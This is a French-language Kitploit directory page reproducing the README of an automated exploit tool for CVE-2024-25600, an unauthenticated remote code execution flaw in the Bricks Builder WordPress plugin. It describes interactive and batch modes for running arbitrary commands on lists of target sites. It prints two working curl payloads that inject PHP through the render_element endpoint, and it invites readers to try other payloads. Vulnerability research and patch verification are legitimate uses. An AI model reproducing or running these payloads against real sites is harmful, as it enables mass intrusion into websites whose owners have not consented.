Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-25600-Bricks-Builder-WordPress — Outil d'exploitation automatisé pour CVE-2024-25600, permettant l'exécution de code à distance non authentifiée sur des sites WordPress utilisant le plugin Bricks Builder. Prend en charge les modes interactif et par lots pour l'exécution de commandes. | Kitploit
Outils/GitHubGitHub/kasoomi0228/cve-2024-25600-bricks-builder-wordpress
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubkasoomi0228/cve-2024-25600-bricks-builder-wordpress

CVE-2024-25600-Bricks-Builder-WordPress

Outil d'exploitation automatisé pour CVE-2024-25600, permettant l'exécution de code à distance non authentifiée sur des sites WordPress utilisant le plugin Bricks Builder. Prend en charge les modes interactif et par lots pour l'exécution de commandes.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 2 ansPas encore vérifié

CVE-2024-25600 Outil d'exploitation 🚀

Description 📝

Cet outil 🛠️ est conçu pour exploiter la vulnérabilité CVE-2024-25600 🕳️ trouvée dans le plugin Bricks Builder pour WordPress. La vulnérabilité permet une exécution de code à distance non authentifiée sur les sites web affectés 💻. L'outil automatise le processus d'exploitation en récupérant des nonces et en envoyant des requêtes spécialement conçues pour exécuter des commandes arbitraires.

Fonctionnalités 🌟

  • Mode interactif : Interagissez avec le site cible en temps réel 🕹️.
  • Mode batch : Analysez et exploitez plusieurs sites web à partir d'une liste 📋.
  • Exécution de commandes : Exécutez des commandes arbitraires sur le serveur cible ⚙️.

Installation 🛠️

  1. Clonez ce dépôt sur votre machine locale 🖥️ en utilisant git clone.
  2. Accédez au répertoire du dépôt cloné.
  3. Installez les bibliothèques Python requises en utilisant pip install -r requirements.txt.

Utilisation 📖

Mode interactif 🎮

  1. Exécutez l'outil avec python exploit.py -u <URL> pour démarrer le mode interactif.
  2. Suivez les instructions à l'écran pour envoyer des commandes au serveur cible.

Mode batch 📊

  1. Préparez un fichier texte avec une liste d'URLs cibles.
  2. Exécutez l'outil avec python exploit.py -l <file_path> pour analyser et exploiter les sites listés.

Preuve de concept (PoC) 📝

Le PoC de base fourni par la divulgation est le suivant :

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Mise à jour : Second PoC (plus fiable)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Il est possible que des charges utiles supplémentaires produisent de meilleurs résultats. Si mon exploit ou ma preuve de concept ne fonctionne pas pour vous, je vous encourage à expérimenter avec des charges utiles alternatives pour trouver une solution plus efficace.

Remplacez [HOST] par le site web cible et [NONCE] par la valeur du nonce récupérée depuis le site.

Référence 📖

Pour plus d'informations sur la vulnérabilité CVE-2024-25600, veuillez vous référer à la divulgation détaillée sur Snicco.io.

Avertissement ⚠️

Les informations fournies dans ce README sont uniquement à des fins éducatives. Le piratage non autorisé de sites web ou de réseaux est illégal et contraire à l'éthique. 🚫

Remerciements 🙏

Félicitations aux chercheurs en sécurité qui ont découvert et signalé cette vulnérabilité, fournissant à la communauté des informations et des outils pour aider à sécuriser leurs applications web.

Télécharger l’outil